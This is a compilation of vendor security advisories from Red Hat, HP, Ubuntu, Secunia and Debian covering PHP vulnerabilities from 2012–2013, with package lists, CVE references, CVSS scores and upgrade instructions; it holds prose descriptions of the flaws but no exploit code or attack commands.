CVE-2010-2950 php: Format string flaw in phar extension via phar_stream_flush() (MOPS-2010-024) 6. Package List: Red Hat Enterprise Linux Desktop Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/php-5.3.3-14.el6_3.src.rpm i386: php-5.3.3-14.el6_3.i686.rpm php-bcmath-5.3.3-14.el6_3.i686.rpm php-cli-5.3.3-14.el6_3.i686.rpm php-common-5.3.3-14.el6_3.i686.rpm php-dba-5.3.3-14.el6_3.i686.rpm php-debuginfo-5.3.3-14.el6_3.i686.rpm php-devel-5.3.3-14.el6_3.i686.rpm php-embedded-5.3.3-14.el6_3.i686.rpm php-enchant-5.3.3-14.el6_3.i686.rpm php-gd-5.3.3-14.el6_3.i686.rpm php-imap-5.3.3-14.el6_3.i686.rpm php-intl-5.3.3-14.el6_3.i686.rpm php-ldap-5.3.3-14.el6_3.i686.rpm php-mbstring-5.3.3-14.el6_3.i686.rpm php-mysql-5.3.3-14.el6_3.i686.rpm php-odbc-5.3.3-14.el6_3.i686.rpm php-pdo-5.3.3-14.el6_3.i686.rpm php-pgsql-5.3.3-14.el6_3.i686.rpm php-process-5.3.3-14.el6_3.i686.rpm php-pspell-5.3.3-14.el6_3.i686.rpm php-recode-5.3.3-14.el6_3.i686.rpm php-snmp-5.3.3-14.el6_3.i686.rpm php-soap-5.3.3-14.el6_3.i686.rpm php-tidy-5.3.3-14.el6_3.i686.rpm php-xml-5.3.3-14.el6_3.i686.rpm php-xmlrpc-5.3.3-14.el6_3.i686.rpm php-zts-5.3.3-14.el6_3.i686.rpm x86_64: php-5.3.3-14.el6_3.x86_64.rpm php-bcmath-5.3.3-14.el6_3.x86_64.rpm php-cli-5.3.3-14.el6_3.x86_64.rpm php-common-5.3.3-14.el6_3.x86_64.rpm php-dba-5.3.3-14.el6_3.x86_64.rpm php-debuginfo-5.3.3-14.el6_3.x86_64.rpm php-devel-5.3.3-14.el6_3.x86_64.rpm php-embedded-5.3.3-14.el6_3.x86_64.rpm php-enchant-5.3.3-14.el6_3.x86_64.rpm php-gd-5.3.3-14.el6_3.x86_64.rpm php-imap-5.3.3-14.el6_3.x86_64.rpm php-intl-5.3.3-14.el6_3.x86_64.rpm php-ldap-5.3.3-14.el6_3.x86_64.rpm php-mbstring-5.3.3-14.el6_3.x86_64.rpm php-mysql-5.3.3-14.el6_3.x86_64.rpm php-odbc-5.3.3-14.el6_3.x86_64.rpm php-pdo-5.3.3-14.el6_3.x86_64.rpm php-pgsql-5.3.3-14.el6_3.x86_64.rpm php-process-5.3.3-14.el6_3.x86_64.rpm php-pspell-5.3.3-14.el6_3.x86_64.rpm php-recode-5.3.3-14.el6_3.x86_64.rpm php-snmp-5.3.3-14.el6_3.x86_64.rpm php-soap-5.3.3-14.el6_3.x86_64.rpm php-tidy-5.3.3-14.el6_3.x86_64.rpm php-xml-5.3.3-14.el6_3.x86_64.rpm php-xmlrpc-5.3.3-14.el6_3.x86_64.rpm php-zts-5.3.3-14.el6_3.x86_64.rpm Red Hat Enterprise Linux HPC Node (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/php-5.3.3-14.el6_3.src.rpm x86_64: php-cli-5.3.3-14.el6_3.x86_64.rpm php-common-5.3.3-14.el6_3.x86_64.rpm php-debuginfo-5.3.3-14.el6_3.x86_64.rpm Red Hat Enterprise Linux HPC Node Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/php-5.3.3-14.el6_3.src.rpm x86_64: php-5.3.3-14.el6_3.x86_64.rpm php-bcmath-5.3.3-14.el6_3.x86_64.rpm php-dba-5.3.3-14.el6_3.x86_64.rpm php-debuginfo-5.3.3-14.el6_3.x86_64.rpm php-devel-5.3.3-14.el6_3.x86_64.rpm php-embedded-5.3.3-14.el6_3.x86_64.rpm php-enchant-5.3.3-14.el6_3.x86_64.rpm php-gd-5.3.3-14.el6_3.x86_64.rpm php-imap-5.3.3-14.el6_3.x86_64.rpm php-intl-5.3.3-14.el6_3.x86_64.rpm php-ldap-5.3.3-14.el6_3.x86_64.rpm php-mbstring-5.3.3-14.el6_3.x86_64.rpm php-mysql-5.3.3-14.el6_3.x86_64.rpm php-odbc-5.3.3-14.el6_3.x86_64.rpm php-pdo-5.3.3-14.el6_3.x86_64.rpm php-pgsql-5.3.3-14.el6_3.x86_64.rpm php-process-5.3.3-14.el6_3.x86_64.rpm php-pspell-5.3.3-14.el6_3.x86_64.rpm php-recode-5.3.3-14.el6_3.x86_64.rpm php-snmp-5.3.3-14.el6_3.x86_64.rpm php-soap-5.3.3-14.el6_3.x86_64.rpm php-tidy-5.3.3-14.el6_3.x86_64.rpm php-xml-5.3.3-14.el6_3.x86_64.rpm php-xmlrpc-5.3.3-14.el6_3.x86_64.rpm php-zts-5.3.3-14.el6_3.x86_64.rpm Red Hat Enterprise Linux Server (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/php-5.3.3-14.el6_3.src.rpm i386: php-5.3.3-14.el6_3.i686.rpm php-cli-5.3.3-14.el6_3.i686.rpm php-common-5.3.3-14.el6_3.i686.rpm php-debuginfo-5.3.3-14.el6_3.i686.rpm php-gd-5.3.3-14.el6_3.i686.rpm php-ldap-5.3.3-14.el6_3.i686.rpm php-mysql-5.3.3-14.el6_3.i686.rpm php-odbc-5.3.3-14.el6_3.i686.rpm php-pdo-5.3.3-14.el6_3.i686.rpm php-pgsql-5.3.3-14.el6_3.i686.rpm php-soap-5.3.3-14.el6_3.i686.rpm php-xml-5.3.3-14.el6_3.i686.rpm php-xmlrpc-5.3.3-14.el6_3.i686.rpm ppc64: php-5.3.3-14.el6_3.ppc64.rpm php-cli-5.3.3-14.el6_3.ppc64.rpm php-common-5.3.3-14.el6_3.ppc64.rpm php-debuginfo-5.3.3-14.el6_3.ppc64.rpm php-gd-5.3.3-14.el6_3.ppc64.rpm php-ldap-5.3.3-14.el6_3.ppc64.rpm php-mysql-5.3.3-14.el6_3.ppc64.rpm php-odbc-5.3.3-14.el6_3.ppc64.rpm php-pdo-5.3.3-14.el6_3.ppc64.rpm php-pgsql-5.3.3-14.el6_3.ppc64.rpm php-soap-5.3.3-14.el6_3.ppc64.rpm php-xml-5.3.3-14.el6_3.ppc64.rpm php-xmlrpc-5.3.3-14.el6_3.ppc64.rpm s390x: php-5.3.3-14.el6_3.s390x.rpm php-cli-5.3.3-14.el6_3.s390x.rpm php-common-5.3.3-14.el6_3.s390x.rpm php-debuginfo-5.3.3-14.el6_3.s390x.rpm php-gd-5.3.3-14.el6_3.s390x.rpm php-ldap-5.3.3-14.el6_3.s390x.rpm php-mysql-5.3.3-14.el6_3.s390x.rpm php-odbc-5.3.3-14.el6_3.s390x.rpm php-pdo-5.3.3-14.el6_3.s390x.rpm php-pgsql-5.3.3-14.el6_3.s390x.rpm php-soap-5.3.3-14.el6_3.s390x.rpm php-xml-5.3.3-14.el6_3.s390x.rpm php-xmlrpc-5.3.3-14.el6_3.s390x.rpm x86_64: php-5.3.3-14.el6_3.x86_64.rpm php-cli-5.3.3-14.el6_3.x86_64.rpm php-common-5.3.3-14.el6_3.x86_64.rpm php-debuginfo-5.3.3-14.el6_3.x86_64.rpm php-gd-5.3.3-14.el6_3.x86_64.rpm php-ldap-5.3.3-14.el6_3.x86_64.rpm php-mysql-5.3.3-14.el6_3.x86_64.rpm php-odbc-5.3.3-14.el6_3.x86_64.rpm php-pdo-5.3.3-14.el6_3.x86_64.rpm php-pgsql-5.3.3-14.el6_3.x86_64.rpm php-soap-5.3.3-14.el6_3.x86_64.rpm php-xml-5.3.3-14.el6_3.x86_64.rpm php-xmlrpc-5.3.3-14.el6_3.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/php-5.3.3-14.el6_3.src.rpm i386: php-bcmath-5.3.3-14.el6_3.i686.rpm php-dba-5.3.3-14.el6_3.i686.rpm php-debuginfo-5.3.3-14.el6_3.i686.rpm php-devel-5.3.3-14.el6_3.i686.rpm php-embedded-5.3.3-14.el6_3.i686.rpm php-enchant-5.3.3-14.el6_3.i686.rpm php-imap-5.3.3-14.el6_3.i686.rpm php-intl-5.3.3-14.el6_3.i686.rpm php-mbstring-5.3.3-14.el6_3.i686.rpm php-process-5.3.3-14.el6_3.i686.rpm php-pspell-5.3.3-14.el6_3.i686.rpm php-recode-5.3.3-14.el6_3.i686.rpm php-snmp-5.3.3-14.el6_3.i686.rpm php-tidy-5.3.3-14.el6_3.i686.rpm php-zts-5.3.3-14.el6_3.i686.rpm ppc64: php-bcmath-5.3.3-14.el6_3.ppc64.rpm php-dba-5.3.3-14.el6_3.ppc64.rpm php-debuginfo-5.3.3-14.el6_3.ppc64.rpm php-devel-5.3.3-14.el6_3.ppc64.rpm php-embedded-5.3.3-14.el6_3.ppc64.rpm php-enchant-5.3.3-14.el6_3.ppc64.rpm php-imap-5.3.3-14.el6_3.ppc64.rpm php-intl-5.3.3-14.el6_3.ppc64.rpm php-mbstring-5.3.3-14.el6_3.ppc64.rpm php-process-5.3.3-14.el6_3.ppc64.rpm php-pspell-5.3.3-14.el6_3.ppc64.rpm php-recode-5.3.3-14.el6_3.ppc64.rpm php-snmp-5.3.3-14.el6_3.ppc64.rpm php-tidy-5.3.3-14.el6_3.ppc64.rpm php-zts-5.3.3-14.el6_3.ppc64.rpm s390x: php-bcmath-5.3.3-14.el6_3.s390x.rpm php-dba-5.3.3-14.el6_3.s390x.rpm php-debuginfo-5.3.3-14.el6_3.s390x.rpm php-devel-5.3.3-14.el6_3.s390x.rpm php-embedded-5.3.3-14.el6_3.s390x.rpm php-enchant-5.3.3-14.el6_3.s390x.rpm php-imap-5.3.3-14.el6_3.s390x.rpm php-intl-5.3.3-14.el6_3.s390x.rpm php-mbstring-5.3.3-14.el6_3.s390x.rpm php-process-5.3.3-14.el6_3.s390x.rpm php-pspell-5.3.3-14.el6_3.s390x.rpm php-recode-5.3.3-14.el6_3.s390x.rpm php-snmp-5.3.3-14.el6_3.s390x.rpm php-tidy-5.3.3-14.el6_3.s390x.rpm php-zts-5.3.3-14.el6_3.s390x.rpm x86_64: php-bcmath-5.3.3-14.el6_3.x86_64.rpm php-dba-5.3.3-14.el6_3.x86_64.rpm php-debuginfo-5.3.3-14.el6_3.x86_64.rpm php-devel-5.3.3-14.el6_3.x86_64.rpm php-embedded-5.3.3-14.el6_3.x86_64.rpm php-enchant-5.3.3-14.el6_3.x86_64.rpm php-imap-5.3.3-14.el6_3.x86_64.rpm php-intl-5.3.3-14.el6_3.x86_64.rpm php-mbstring-5.3.3-14.el6_3.x86_64.rpm php-process-5.3.3-14.el6_3.x86_64.rpm php-pspell-5.3.3-14.el6_3.x86_64.rpm php-recode-5.3.3-14.el6_3.x86_64.rpm php-snmp-5.3.3-14.el6_3.x86_64.rpm php-tidy-5.3.3-14.el6_3.x86_64.rpm php-zts-5.3.3-14.el6_3.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/php-5.3.3-14.el6_3.src.rpm i386: php-5.3.3-14.el6_3.i686.rpm php-cli-5.3.3-14.el6_3.i686.rpm php-common-5.3.3-14.el6_3.i686.rpm php-debuginfo-5.3.3-14.el6_3.i686.rpm php-gd-5.3.3-14.el6_3.i686.rpm php-ldap-5.3.3-14.el6_3.i686.rpm php-mysql-5.3.3-14.el6_3.i686.rpm php-odbc-5.3.3-14.el6_3.i686.rpm php-pdo-5.3.3-14.el6_3.i686.rpm php-pgsql-5.3.3-14.el6_3.i686.rpm php-soap-5.3.3-14.el6_3.i686.rpm php-xml-5.3.3-14.el6_3.i686.rpm php-xmlrpc-5.3.3-14.el6_3.i686.rpm x86_64: php-5.3.3-14.el6_3.x86_64.rpm php-cli-5.3.3-14.el6_3.x86_64.rpm php-common-5.3.3-14.el6_3.x86_64.rpm php-debuginfo-5.3.3-14.el6_3.x86_64.rpm php-gd-5.3.3-14.el6_3.x86_64.rpm php-ldap-5.3.3-14.el6_3.x86_64.rpm php-mysql-5.3.3-14.el6_3.x86_64.rpm php-odbc-5.3.3-14.el6_3.x86_64.rpm php-pdo-5.3.3-14.el6_3.x86_64.rpm php-pgsql-5.3.3-14.el6_3.x86_64.rpm php-soap-5.3.3-14.el6_3.x86_64.rpm php-xml-5.3.3-14.el6_3.x86_64.rpm php-xmlrpc-5.3.3-14.el6_3.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/php-5.3.3-14.el6_3.src.rpm i386: php-bcmath-5.3.3-14.el6_3.i686.rpm php-dba-5.3.3-14.el6_3.i686.rpm php-debuginfo-5.3.3-14.el6_3.i686.rpm php-devel-5.3.3-14.el6_3.i686.rpm php-embedded-5.3.3-14.el6_3.i686.rpm php-enchant-5.3.3-14.el6_3.i686.rpm php-imap-5.3.3-14.el6_3.i686.rpm php-intl-5.3.3-14.el6_3.i686.rpm php-mbstring-5.3.3-14.el6_3.i686.rpm php-process-5.3.3-14.el6_3.i686.rpm php-pspell-5.3.3-14.el6_3.i686.rpm php-recode-5.3.3-14.el6_3.i686.rpm php-snmp-5.3.3-14.el6_3.i686.rpm php-tidy-5.3.3-14.el6_3.i686.rpm php-zts-5.3.3-14.el6_3.i686.rpm x86_64: php-bcmath-5.3.3-14.el6_3.x86_64.rpm php-dba-5.3.3-14.el6_3.x86_64.rpm php-debuginfo-5.3.3-14.el6_3.x86_64.rpm php-devel-5.3.3-14.el6_3.x86_64.rpm php-embedded-5.3.3-14.el6_3.x86_64.rpm php-enchant-5.3.3-14.el6_3.x86_64.rpm php-imap-5.3.3-14.el6_3.x86_64.rpm php-intl-5.3.3-14.el6_3.x86_64.rpm php-mbstring-5.3.3-14.el6_3.x86_64.rpm php-process-5.3.3-14.el6_3.x86_64.rpm php-pspell-5.3.3-14.el6_3.x86_64.rpm php-recode-5.3.3-14.el6_3.x86_64.rpm php-snmp-5.3.3-14.el6_3.x86_64.rpm php-tidy-5.3.3-14.el6_3.x86_64.rpm php-zts-5.3.3-14.el6_3.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2010-2950.html https://www.redhat.com/security/data/cve/CVE-2011-4153.html https://www.redhat.com/security/data/cve/CVE-2012-0057.html https://www.redhat.com/security/data/cve/CVE-2012-0781.html https://www.redhat.com/security/data/cve/CVE-2012-0789.html https://www.redhat.com/security/data/cve/CVE-2012-1172.html https://www.redhat.com/security/data/cve/CVE-2012-2143.html https://www.redhat.com/security/data/cve/CVE-2012-2336.html https://www.redhat.com/security/data/cve/CVE-2012-2386.html https://access.redhat.com/security/updates/classification/#moderate https://rhn.redhat.com/errata/RHSA-2012-0546.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFP6yxRXlSAg2UNWIIRAqlmAKCLhNreR9eJ9DMLQgGynQ1AR57OhwCeNCjP 5dEIaw64iUF1AYJgb6tOHK0= =KioB -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03839862 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03839862 Version: 1 HPSBMU02900 rev.1 - HP System Management Homepage (SMH) running on Linux and Windows, Multiple Remote and Local Vulnerabilities NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2013-07-18 Last Updated: 2013-07-18 Potential Security Impact: Local Denial of Service (DoS), remote Denial of Service (DoS), execution of arbitrary code, gain extended privileges, disclosure of information, unauthorized access, XSS Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP System Management Homepage (SMH) running on Linux and Windows. The vulnerabilities could be exploited remotely resulting in Local Denial of Service (DoS), remote Denial of Service (DoS), execution of arbitrary code, gain privileges, disclosure of information, unauthorized access, or XSS. References: CVE-2011-3389 (SSRT100740) Remote disclosure of information CVE-2012-0883 (SSRT101209) Remote gain extended privileges CVE-2012-2110 (SSRT101210) Remote Denial of Service (DoS) CVE-2012-2311 (SSRT100992) Remote execution of arbitrary code CVE-2012-2329 (SSRT100992) Remote Denial of Service (DoS) CVE-2012-2335 (SSRT100992) Remote execution of arbitrary code CVE-2012-2336 (SSRT100992) Remote Denial of Service (DoS) CVE-2013-2355 (SSRT100696) Remote unauthorized Access CVE-2013-2356 (SSRT100835) Remote disclosure of information CVE-2013-2357 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2358 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2359 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2360 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2361 (SSRT101007) XSS CVE-2013-2362 (SSRT101076, ZDI-CAN-1676) Local Denial of Service (DoS) CVE-2013-2363 (SSRT101150) Remote disclosure of information CVE-2013-2364 (SSRT101151) XSS CVE-2013-5217 (SSRT101137) Remote unauthorized access SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP System Management Homepage (SMH) v7.2.0 and earlier running on Linux and Windows. BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2011-3389 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2012-0883 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2012-2110 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-2311 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-2329 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-2335 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-2336 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-2355 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2013-2356 (AV:N/AC:L/Au:N/C:C/I:N/A:N) 7.8 CVE-2013-2357 (AV:N/AC:M/Au:S/C:N/I:N/A:C) 6.3 CVE-2013-2358 (AV:N/AC:M/Au:S/C:N/I:N/A:C) 6.3 CVE-2013-2359 (AV:N/AC:M/Au:S/C:N/I:N/A:P) 3.5 CVE-2013-2360 (AV:N/AC:M/Au:S/C:N/I:N/A:P) 3.5 CVE-2013-2361 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2013-2362 (AV:L/AC:H/Au:S/C:N/I:N/A:P) 1.0 CVE-2013-2363 (AV:N/AC:H/Au:N/C:C/I:N/A:P) 6.1 CVE-2013-2364 (AV:N/AC:L/Au:S/C:N/I:N/A:P) 4.0 CVE-2013-5217 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks agix for working with the TippingPoint Zero Day Initiative to report vulnerability CVE-2013-2362 to security-alert@hp.com RESOLUTION HP has made System Management Homepage (SMH) v7.2.1 or subsequent available for Windows and Linux to resolve the vulnerabilities. Information and updates for SMH can be found at the following location: http://h18013.www1.hp.com/products/servers/management/agents/index.html HISTORY Version:1 (rev.1) - 18 July 2013 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. ============================================================================ Ubuntu Security Notice USN-1481-1 June 19, 2012 php5 vulnerabilities ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 12.04 LTS - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.04 LTS - Ubuntu 8.04 LTS Summary: Several security issues were fixed in PHP. Software Description: - php5: HTML-embedded scripting language interpreter Details: It was discovered that PHP incorrectly handled certain Tidy::diagnose operations on invalid objects. (CVE-2012-1172) Rubin Xu and Joseph Bonneau discovered that PHP incorrectly handled certain Unicode characters in passwords passed to the crypt() function. (CVE-2012-2143) It was discovered that a Debian/Ubuntu specific patch caused PHP to incorrectly handle empty salt strings. This issue only affected Ubuntu 10.04 LTS and Ubuntu 11.04. (CVE-2012-2317) It was discovered that PHP, when used as a stand alone CGI processor for the Apache Web Server, did not properly parse and filter query strings. Configurations using mod_php5 and FastCGI were not vulnerable. (CVE-2012-2386) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 12.04 LTS: php5 5.3.10-1ubuntu3.2 Ubuntu 11.10: php5 5.3.6-13ubuntu3.8 Ubuntu 11.04: php5 5.3.5-1ubuntu7.10 Ubuntu 10.04 LTS: php5 5.3.2-1ubuntu4.17 Ubuntu 8.04 LTS: php5 5.2.4-2ubuntu5.25 In general, a standard system update will make all the necessary changes

sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script (aka php-cgi), does not properly handle query strings that contain a %3D sequence but no = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1823. This vulnerability CVE-2012-1823 Vulnerability due to insufficient fix for.A third party could execute arbitrary code by placing command line options in the query string. PHP is prone to an information-disclosure vulnerability. Exploiting this issue allows remote attackers to view the source code of files in the context of the server process. This may allow the attacker to obtain sensitive information and to run arbitrary PHP code on the affected computer; other attacks are also possible. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Ubuntu update for php SECUNIA ADVISORY ID: SA49097 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49097/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49097 RELEASE DATE: 2012-05-07 DISCUSS ADVISORY: http://secunia.com/advisories/49097/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49097/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49097 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Ubuntu has issued an update for php. This fixes a vulnerability, which can be exploited by malicious people to disclose certain sensitive information or compromise a vulnerable system. For more information: SA49014 SOLUTION: Apply updated packages. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ORIGINAL ADVISORY: USN-1437-1: http://www.ubuntu.com/usn/usn-1437-1/ OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Additionally, this update fixes insufficient validation of upload name which lead to corrupted $_FILES indices. For the stable distribution (squeeze), this problem has been fixed in version 5.3.3-7+squeeze9. The testing distribution (wheezy) will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 5.4.3-1. We recommend that you upgrade your php5 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iQEcBAEBAgAGBQJPqqf3AAoJEOxfUAG2iX57MqcIALyiggqZ6SR+lOtdAd7npKd3 lZ3nXZVUvyC5e4/gageT3s2BlmuipGIrBvyraWR2TvAlNYIu7Ia6EMVsjG0T3gHu iM2yB4+wCaV8CIHqzmyN9lDaotxVty9gQ8BdtJaZguwi9+Sw7KfaCw6CXTluqPkU Ocdb7Saz7eVnNnVwTORxOCBnlIZDn4PbiW9tMLZawGTwNgdT/2lMS8czJGVmf/Oj j4c631zN1K8vlnctHCYQAS269nr9jwmEx0JKcWl5khc7XMi/SmcUG9xG4p5JpGrA ZbBAySyLuxr9bdMA3I9Jqxmmq4uaGwpCH8DSfMJd5FHNXKfq7efnL1Hp5mOERHU= =snJW -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03368475 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03368475 Version: 1 HPSBUX02791 SSRT100856 rev.1 - HP-UX Apache Web Server running PHP, Remote Execution of Arbitrary Code, Privilege Elevation, Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2012-06-14 Last Updated: 2012-06-14 Potential Security Impact: Remote execution of arbitrary code, privilege elevation, or Denial of Service (DoS). Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP-UX Apache Web Server running PHP. These vulnerabilities could be exploited remotely to execute arbitrary code, elevate privileges, or create a Denial of Service (DoS). PHP is contained in the HP-UX Apache Web Server Suite. References: CVE-2011-4153, CVE-2012-0830, CVE-2012-0883, CVE-2012-1172, CVE-2012-1823, CVE-2012-2311 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.23, B.11.31 running HP-UX Apache Web Server Suite v3.24 or earlier BACKGROUND For a PGP signed CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2011-4153 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-0830 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-0883 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2012-1172 (AV:N/AC:M/Au:N/C:N/I:P/A:P) 5.8 CVE-2012-1823 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-2311 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided the following software updates to resolve the vulnerabilities. The updates are available for download from http://software.hp.com HP-UX Web Server Suite v.3.24 containing Apache v2.2.15.13 and PHP v5.2.17 HP-UX 11i Release Apache Depot name B.11.23 (32-bit) HPUXWS22ATW-B324-32 B.11.23 (64-bit) HPUXWS22ATW-B324-64 B.11.31 (32-bit) HPUXWS22ATW-B324-32 B.11.31 (64-bit) HPUXWS22ATW-B324-64 MANUAL ACTIONS: Yes - Update Install HP-UX Web Server Suite v3.24 or subsequent. PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific 